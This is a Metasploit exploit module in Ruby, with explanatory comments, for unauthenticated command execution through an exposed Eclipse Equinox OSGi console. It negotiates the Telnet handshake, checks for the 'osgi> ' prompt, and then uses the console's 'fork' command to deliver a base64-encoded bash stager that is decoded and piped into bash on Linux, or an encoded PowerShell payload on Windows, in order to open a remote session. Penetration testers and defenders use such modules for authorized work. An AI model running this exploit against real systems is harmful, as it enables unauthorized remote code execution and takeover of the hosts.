Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'base64'

# Eclipse Equinox OSGi console module.
#
# The module speaks to the Equinox console over a raw TCP socket: it first
# answers the console's Telnet option negotiation, then expects the "osgi> "
# prompt, and finally uses the console's 'fork' command to run an OS command.
# Two delivery paths exist: the Linux target goes through the CmdStager
# ('bourne' flavor, see #execute_command), the Windows target sends a single
# PowerShell command line built by the Powershell mixin (see #exploit).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  # Short alias for the Telnet mixin so the IAC/WILL/DO/SB/SE and option byte
  # constants used in the negotiation below stay readable.
  TELNET_IAC = Msf::Exploit::Remote::Telnet

  # Module metadata and options.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Eclipse Equinox OSGi Console Command Execution',
      'Description'    => %q{
        Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console
        'fork' command to execute arbitrary commands on the remote system.
      },
      'Author'         =>
        [
          'Quentin Kaiser <[email protected]>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
        ],
      'Platform'       => %w{ linux win },
      'Arch'           => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
      'Targets'=> [
        [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
        [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
      ],
      'CmdStagerFlavor' => [ 'bourne' ],
      'DisclosureDate'  => '2018-02-13',
      'DefaultTarget'   => 0))
    # These options arrive via an included mixin and are never read by this
    # raw-TCP module, so hide them from the user.
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
    register_options([
      # Upper bound, in seconds, on the session polling loop in #exploit.
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
    ])
  end

  # Probes the service for an exposed Equinox console.
  #
  # Reads the server's first bytes; if they are exactly the expected Telnet
  # option negotiation (WILL ECHO, WILL SGA, DO NAWS, DO TTYPE), answers the
  # TTYPE request with a terminal-type subnegotiation ("xterm-256color") and
  # reads again. The connection is closed before the verdict is computed.
  # The service is reported Vulnerable only when the last data read is
  # exactly the "osgi> " prompt; anything else, including no data at all,
  # yields Safe. The same negotiation is repeated inline in #exec_command.
  #
  # @return [Exploit::CheckCode] Vulnerable or Safe
  def check
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
        "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
      res = sock.get_once
    end
    disconnect
    if res && res == "osgi> "
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  # Main entry point.
  #
  # Runs #check first and aborts with Failure::NoTarget unless the console
  # prompt was seen. The delivery path is chosen by the selected target's
  # 'Platform': Windows sends one 'fork' command carrying a PowerShell
  # command line, Linux hands off to execute_cmdstager (which calls
  # #execute_command). Afterwards session_created? is polled once a second
  # for up to TIME_WAIT seconds; the method returns normally whether or not
  # a session appeared. Connection-level errors are turned into
  # fail_with(Failure::Unknown), and the ensure always closes the socket.
  def exploit
    begin
      print_status("Accessing the OSGi console ...")

      unless check == Exploit::CheckCode::Vulnerable
        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
      end

      if target['Platform'] == "win" then
        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
      else
        execute_cmdstager({:flavor => :bourne})
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")

      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)
        # Success! session is here!
        break if session_created?
      end
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  # Sends one console command line over a fresh connection.
  #
  # Repeats the Telnet negotiation from #check (same byte sequence, kept
  # inline rather than shared), writes the command terminated by CRLF, then
  # issues 'disconnect' and confirms it with 'y'. The responses are read into
  # `res` but never inspected, so a rejected or failed command is not
  # detected here; callers ignore the return value. The socket opened by
  # connect is left for the caller to close (see the ensure in #exploit).
  #
  # @param cmd [String] console command line, sent verbatim
  def exec_command(cmd)
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
        "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
      res = sock.get_once
    end
    print_status("Exploiting...")
    sock.put("#{cmd}\r\n")
    res = sock.get
    sock.put("disconnect\r\n")
    res = sock.get
    sock.put("y\r\n")
  end

  # CmdStager callback, invoked by execute_cmdstager for the Linux target.
  #
  # The stager command is Base64-encoded with encode64's line breaks stripped
  # (so the blob contains no whitespace) and wrapped in a bash pipeline that
  # decodes and runs it, passed to the console's 'fork' command. The inline
  # comment below documents the reason given by the author; the brace forms
  # presumably exist to avoid literal spaces in the fork argument. Requires
  # bash on the target.
  #
  # @param cmd [String] stager command line to run
  # @param opts [Hash] unused; accepted to satisfy the CmdStager callback signature
  def execute_command(cmd, opts={})
    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
  end
end